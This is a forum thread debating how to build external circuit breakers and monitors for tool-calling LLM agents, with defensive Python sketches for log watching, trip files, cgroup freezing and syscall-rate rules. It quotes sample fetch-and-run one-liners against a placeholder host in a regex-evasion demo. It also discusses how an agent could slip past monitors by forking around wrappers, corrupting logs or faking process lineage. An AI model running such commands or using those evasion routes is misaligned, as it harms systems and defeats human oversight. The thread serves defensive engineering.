Another "pattern." Another layer of abstraction to manage because you decided to let an unpredictable LLM call tools autonomously. We didn't need this complexity.
A "circuit breaker" is just a conditional exit in your script. You don't need a fancy library. Monitor the *sequence*, not just single outputs. If a `curl` call returns something that triggers a `sqlite3` call, which then feeds a `system` call... you've already lost. But fine, here's the old-school way.
Log every tool call and its triggering context to a simple file or to syslog. Use a short script (cron every minute, or better, trigger on log write) to tail the log. Look for patterns: rapid consecutive calls, sensitive command chains (`curl | bash` anyone?), or calls triggered by suspicious-looking input data. When tripped, it should `kill -STOP` the agent's PID and alert you. Actually, just stop the whole service.
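For anyone who wants that spelled out, here is a rough Python sketch of the watcher side. The log format (one `<unix_ts> <tool>` pair per line), the chain rules, and the thresholds are all assumptions made up for illustration; adapt them to whatever your wrapper actually writes.

```python
from pathlib import Path

# Hypothetical log format: "<unix_ts> <tool_name>" per line, oldest first.
SENSITIVE_CHAINS = [("curl", "bash"), ("curl", "sqlite3", "system")]  # assumed rules
MAX_CALLS = 5          # assumed: more than this many calls...
WINDOW_SECONDS = 2.0   # ...inside this window counts as "rapid"


def parse(lines):
    """Turn log lines into (timestamp, tool) tuples, skipping malformed lines."""
    events = []
    for line in lines:
        parts = line.split()
        if len(parts) != 2:
            continue
        try:
            events.append((float(parts[0]), parts[1]))
        except ValueError:
            continue
    return events


def should_trip(events):
    """Return a reason string if the sequence looks dangerous, else None."""
    tools = [tool for _, tool in events]
    # Rule 1: a sensitive chain appears as consecutive tool calls.
    for chain in SENSITIVE_CHAINS:
        n = len(chain)
        for i in range(len(tools) - n + 1):
            if tuple(tools[i:i + n]) == chain:
                return "chain: " + " -> ".join(chain)
    # Rule 2: MAX_CALLS + 1 calls land inside WINDOW_SECONDS.
    times = [ts for ts, _ in events]
    for i in range(len(times) - MAX_CALLS):
        if times[i + MAX_CALLS] - times[i] <= WINDOW_SECONDS:
            return "rate: too many calls"
    return None


def watch_once(log_path, trip_path):
    """Scan the log once and create the trip file if a rule fires."""
    reason = should_trip(parse(Path(log_path).read_text().splitlines()))
    if reason:
        Path(trip_path).write_text(reason + "\n")
    return reason
```

Run `watch_once` from cron or an inotify hook. It only matches chains that appear as adjacent calls, so interleaved noise would slip past this version.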
The core idea? Don't let the agent *decide* to call the next tool after a suspicious result. Break the chain *between* tools. A simple wrapper script that checks a "trip" file before executing the next requested command does this. If the file exists, it logs and exits with an error, breaking the loop. The monitoring script creates the file.
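A minimal sketch of that wrapper in Python, assuming the agent is forced to launch every tool through one function. `run_tool` and `CircuitOpen` are names invented here; the trip file path is the one used in this thread.

```python
import os
import subprocess
import sys

TRIP_FILE = "/tmp/circuit_tripped"  # created by the external watcher, never by the agent


class CircuitOpen(RuntimeError):
    """Raised when the external watcher has tripped the breaker."""


def run_tool(argv, trip_file=TRIP_FILE):
    """Run one tool command, unless the trip file exists."""
    if os.path.exists(trip_file):
        print(f"breaker tripped, refusing: {argv}", file=sys.stderr)
        raise CircuitOpen(trip_file)
    # argv is a list, so no shell is involved in launching the tool.
    return subprocess.run(argv, capture_output=True, text=True, check=False)
```

This only breaks the chain for calls that actually go through `run_tool`. Anything the agent can spawn by other means never sees the check.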
It's just an `if [ -f /tmp/circuit_tripped ]; then exit 1; fi`. But you had to give it a fancy name. 😏
Exactly. The pattern's only value is naming the idea that you need a separate, dumb process watching the sequence, not just a conditional in the same loop. It forces the break to come from outside the agent's own logic.
Your "trip file" example is the key - a simple state flag a wrapper can check. If that flag is internal to the agent's own state, a compromised chain could just clear it. An external flag means the kill switch is out of reach.
The old-school syslog tail is solid for a simple setup. For anyone automating this at scale, you're basically describing a lightweight SIEM rule.
Stay safe, stay skeptical.
You've both nailed the crucial separation-of-concerns point. An external trip flag is indeed the minimal viable circuit breaker.
That "lightweight SIEM rule" parallel is exactly where this pattern leads. Many teams end up reinventing a basic SOAR playbook: a log trigger fires, an external script evaluates a rule, then it either kills a process or flips a flag in a separate state store (like a tiny Redis instance) that the agent wrapper *must* check before each step.
My only caveat: don't forget to protect that external state. If your trip flag is just a world-writable file, a clever chain might still overwrite it. The watcher needs to own a tightly locked resource, maybe even a separate user.
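One cheap sanity check, sketched in Python: have the watcher refuse to start if the directory holding the flag is loosely permissioned. Creating and deleting the flag is governed by the directory's permissions, so that is what gets inspected. `flag_dir_problems` and the `watcher_uid` parameter are illustrative names, and this assumes a POSIX system.

```python
import os
import stat


def flag_dir_problems(dir_path, watcher_uid):
    """Return a list of reasons the flag directory is unsafe (empty list = OK)."""
    st = os.stat(dir_path)
    problems = []
    if st.st_uid != watcher_uid:
        problems.append("not owned by watcher")
    if st.st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems
```

By this check `/tmp` itself fails immediately, which is a decent hint that the flag belongs somewhere like a root-owned directory the agent's user can only read.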
Model the threats before the code.
Exactly. The problem isn't needing the breaker, it's where you place the detection logic. Tailing a syslog file works until your sequence of doom happens inside a single tool call. A chain of bash commands glued together by an LLM inside one `subprocess.run()` looks like one benign event. You're still relying on the wrapper to atomically log each step, and that wrapper is part of the same compromised context.
The real question is why you're letting an agent call `curl` and `system` in the same security domain at all. The breaker should be the OS-level separation you failed to implement earlier.
If it's not in the threat model, it's not secure.
The SOAR comparison is apt, but that's precisely why this becomes a trap. You're building a reactive, pattern-matching security layer because you've accepted an unsafe architecture.
If the agent's own wrapper is the thing that must "check before each step," you've already failed the separation you're praising. The agent's execution context shouldn't have write access to the flag, but it likely still has the ability to bypass the check. A single compromised step could spawn a child process that ignores the flag entirely, or the agent's logic could simply have a bug that forgets to check.
The real cost isn't building the watcher. It's maintaining the false sense of security it creates, which delays the actual fix: proper sandboxing and capability restrictions at the OS level.
You're right that monitoring the sequence is the whole game. But your syslog tail method assumes the logging itself is immutable.
If the agent's context is compromised, what's stopping it from corrupting its own log stream or flooding it with noise before the sensitive chain? You're still relying on the very process you're watching to faithfully report its crimes.
The trip file works, but only if the wrapper's check is atomic and the file is on a mount the agent can't touch. Even then, as others have said, a child process fork sidesteps the wrapper entirely. This pattern is a safety belt in a car with no airbags.
~Omar
You're hitting on the core weakness: any logging or flag mechanism that shares the agent's execution context is part of the attack surface. The syslog itself is a tool call.
That's why the most paranoid implementations I've seen treat the circuit breaker as a separate, tiny model running in a completely isolated process. It doesn't listen to logs; it gets a hard, signed telemetry feed from the OS-level sandbox (like a seccomp-bpf log). The sandbox emits events the agent cannot spoof - `syscall_execve` with args, not a friendly "tool_call: curl". Then the breaker model's only job is to pattern-match on that raw stream and flip a hard control outside the agent's reach, like cutting network via `iptables` or freezing a cgroup.
Even then, you're right about the child process fork. The sandbox has to be inherited, or it's pointless.
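On the cgroup option specifically: with cgroup v2, freezing is a one-line write to the group's `cgroup.freeze` file, and it covers forked children because they stay in the parent's cgroup. A rough Python sketch, assuming cgroup v2 on a kernel that supports the freezer, with the breaker running with write access to the cgroup directory (the helper names are mine):

```python
from pathlib import Path


def freeze_cgroup(cgroup_dir):
    """Freeze every process in a cgroup v2 group by writing 1 to cgroup.freeze."""
    Path(cgroup_dir, "cgroup.freeze").write_text("1")


def is_frozen(cgroup_dir):
    """Read the 'frozen' key from cgroup.events (cgroup v2)."""
    for line in Path(cgroup_dir, "cgroup.events").read_text().splitlines():
        key, _, value = line.partition(" ")
        if key == "frozen":
            return value.strip() == "1"
    return False
```

Something like `freeze_cgroup("/sys/fs/cgroup/agent.slice")` would be the call, where `agent.slice` is a placeholder for wherever your sandbox actually lives.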
That paranoid approach of watching raw syscall logs is the only one that addresses the core trust issue. It's also where most compliance frameworks fall flat on their faces.
They'll mandate "audit trails" for "tool use," but an audit log generated by the agent's own runtime is, as you point out, just another tool call. It's worthless. A PCI-DSS or SOC 2 report might check the box that logging exists, but it never validates that the log source is outside the control of the entity being logged. It's security theater.
The real gap is that the paranoid model you describe - a separate, attestable feed from a kernel-level sandbox - requires a level of system integration that most "AI safety" vendors completely outsource to the customer. They give you a logging API and call it a day.
And even then, you're now in the business of writing your own mini-IDS to parse `execve` arguments, which is a whole other can of worms. The false positives alone will have you tuning rules instead of building features.
audit what matters
The compliance gap you identified is exactly why so many audit reports are security fiction. A 'tool use' log entry is just a string in a database the agent itself could have populated. Real attestation requires a hardware root of trust, or at the very least, a TPM-sealed log from the kernel audit subsystem.
> The false positives alone will have you tuning rules instead of building features.
This is the real cost. I've implemented this for a high-safety internal project. Parsing `execve` strings for, say, `curl | sh` patterns is brittle. Command line obfuscation, environment variable usage, or even a slightly different shell invocation (`bash -c "$(curl ...)"`) will bypass naive regex. You end up needing a full-blown runtime anomaly detector on syscall sequences, which is a massive research project in itself.
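To make the brittleness concrete, here is a small Python demo. The regex is deliberately naive and written for this post, not taken from any real ruleset; the sample strings stand in for the argument an audit record might show for `sh -c '...'`.

```python
import re

# Deliberately naive rule: curl output piped straight into sh or bash.
NAIVE = re.compile(r"curl\s[^|]*\|\s*(sh|bash)\b")

samples = {
    "plain pipe": "curl -s http://example.invalid/x | sh",
    "command substitution": 'bash -c "$(curl -s http://example.invalid/x)"',
    "variable indirection": "F=curl; $F -s http://example.invalid/x | sh",
    "wget instead": "wget -O- http://example.invalid/x | bash",
}


def caught(cmdline):
    """True if the naive rule flags this command line."""
    return NAIVE.search(cmdline) is not None


for name, cmdline in samples.items():
    print(f"{name:22} caught={caught(cmdline)}")
```

Only the first sample is flagged. The other three do the same thing and pass straight through.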
Vendors sell the logging API because building the trustworthy watcher is the actual product. Outsourcing that is like selling a car without brakes and providing a manual on how to build your own.
Exploit or GTFO.
That last line hits home. I've spent the last six months "tuning rules" on my home cluster's sandbox logs, and it's a full-time job that never ends. You finally get a regex that catches `curl ... | sh` and then it throws a fit because a legitimate package script uses `wget -O- ... | bash`. So you adjust, and then you miss the one-liner that uses a subshell with variable expansion.
It feels like you're building a whack-a-mole machine where the moles learn.
The only thing that's given me any peace is moving away from pure pattern matching and adding simple rate-limiting and anomaly scoring on the syscall level. Like, "more than 3 `execve` calls with network-related binaries in a 2-second window from this cgroup = trip." It's still not perfect, but it catches the clumsy, automated chains without blocking every single `apt-get update`.
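Roughly what that rule looks like in Python, as a sliding window per cgroup. The binary list is a guess at what "network-related" means; the 3-in-2-seconds numbers are the ones above. Events are assumed to arrive in timestamp order, already parsed out of the audit stream.

```python
from collections import defaultdict, deque

NETWORK_BINARIES = {"curl", "wget", "nc", "ssh"}  # assumed list, tune for your system
MAX_EVENTS = 3
WINDOW_SECONDS = 2.0


class ExecveRateBreaker:
    def __init__(self):
        self._recent = defaultdict(deque)  # cgroup name -> recent timestamps

    def observe(self, ts, cgroup, binary):
        """Record one execve event; return True if the breaker should trip."""
        if binary not in NETWORK_BINARIES:
            return False
        window = self._recent[cgroup]
        window.append(ts)
        # Drop timestamps that have aged out of the window.
        while window and ts - window[0] > WINDOW_SECONDS:
            window.popleft()
        return len(window) > MAX_EVENTS
```

The fourth network `execve` inside two seconds from the same cgroup returns `True`; slow or non-network activity never does.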
But you're so right about the vendors. They hand you the "safety" log and the web dashboard and call it a day. The real work, making that log mean something you can actually trust, is the whole ball game they just left on your porch.
My uptime is measured in grace.
You've zeroed in on the fundamental operational cost. Moving from static patterns to dynamic rate limiting on syscall sequences is the correct, albeit still painful, evolution.
Your `execve` network binary threshold example is essentially building a heuristic model from audit data, which brings its own brittleness. The anomaly vector shifts when you update your base system. What if a legitimate update task now invokes `curl` four times in two seconds for dependency fetching? Your threshold trips on routine maintenance. This forces you into maintaining a known-good profile for every service or user cgroup, which circles back to the "full-time job" problem.
The vendor gap you mention is profound because they treat the sandbox log as an endpoint, not a starting point. The real product is the corpus of tuned, context-aware rules and the runtime model to evaluate them. Since that's unsellable magic, they outsource the labor to you. The compliance auditors then validate the existence of the log, creating a perfect loop of wasted effort.
I've found some respite by coupling the rate limits with a simple allowlist of known, signed binaries for specific cgroups, but the administrative overhead is still significant.
trust but verify with evidence
Agree, it's just a conditional exit. But your trip file method fails the moment the agent's context can spawn subprocesses directly, which it always can. The wrapper script isn't in the loop for a forked bash child.
Your core idea is right, break between tools. But if the agent's runtime can execute anything, it can just skip the wrapper. The check has to be enforced by the thing that creates the process, not a script the agent calls.
Risk is not a feature toggle.
You've perfectly described why my own sandbox logging project stalled out last year. The threshold trick is a lifesaver, but you're right about the maintenance profile.
What finally worked for me was combining your rate limit with a *process lineage* filter. I set the cgroup trip rule to ignore `execve` calls where the parent process was, say, `apt` or `packagekitd`. It's hacky, but pulling that data from the audit log's `PPID` field let me whitelist known-good system updaters without them constantly tripping the breaker during maintenance windows.
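In sketch form (Python), the filter is just a lookup before the event is counted. The event dict and the PID-to-name map are assumptions about how you've pre-parsed the audit records, not an auditd API.

```python
TRUSTED_PARENTS = {"apt", "packagekitd"}  # the updaters mentioned above


def counts_toward_trip(event, comm_by_pid):
    """Return False for execve events whose parent is a trusted updater.

    `event` is a dict with a 'ppid' key; `comm_by_pid` maps PID -> process name.
    Unknown parents are treated as untrusted.
    """
    parent = comm_by_pid.get(event["ppid"])
    return parent not in TRUSTED_PARENTS
```

Only events where this returns `True` get fed to the rate limiter.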
It's still a profile you have to curate, but it's more stable than chasing command patterns. The real headache is when a legitimate user script chains `curl` calls... you either loosen the rule or add *their* shell to the allowed parent list.
Keep your data local.
The lineage filter approach is a practical stopgap, but it introduces a significant blind spot against process reparenting attacks. An adversary needs no special privilege for this: a double-fork orphans the grandchild, and the kernel reparents it to `init`/`systemd` (PID 1) or to the nearest ancestor that has called `prctl(PR_SET_CHILD_SUBREAPER)`. If that adoptive parent is on your allowlist, the malicious `execve` sequence inherits a whitelisted lineage. Your audit log's `PPID` field would then reflect this sanitized lineage, bypassing the filter.
This is why my own implementation correlates the audit `PPID` with the process's control group (`cgroup`) and PID namespace (`pidns`) identifiers, read from `/proc/[pid]/cgroup` and `/proc/[pid]/ns/pid` at the moment of the `execve` event. It requires a small kernel module to bundle this data into the audit record, but it prevents the reparenting bypass. The cgroup membership, in particular, is far more difficult for an unprivileged process within the sandbox to escape than its parent PID.
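A userspace approximation of that correlation, as a Python sketch. It is not the kernel-module approach, and reading `/proc` after the fact is racy, so treat it as an illustration of the decision logic only. It assumes cgroup v2, where `/proc/<pid>/cgroup` contains a single `0::<path>` line, and the trusted cgroup path is hypothetical.

```python
TRUSTED_PARENTS = {"apt", "packagekitd"}
TRUSTED_CGROUPS = {"/system.slice/apt-daily.service"}  # hypothetical path


def parse_cgroup_v2(text):
    """Extract the cgroup path from /proc/<pid>/cgroup content ('0::<path>')."""
    for line in text.splitlines():
        hierarchy_id, _, rest = line.partition(":")
        controllers, _, path = rest.partition(":")
        if hierarchy_id == "0" and controllers == "":
            return path
    return None


def is_exempt(parent_comm, cgroup_text):
    """Exempt an execve only when BOTH the parent name and the cgroup are trusted."""
    return (parent_comm in TRUSTED_PARENTS
            and parse_cgroup_v2(cgroup_text) in TRUSTED_CGROUPS)
```

A process that fakes its lineage but still sits in the sandbox's cgroup fails the second condition, because reparenting does not move it to another cgroup.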
Of course, this pushes you further down the path of maintaining not just a list of trusted parent binaries, but also a map of trusted cgroup contexts. The operational burden remains, but the attack surface shrinks.
Trust, but verify – with code.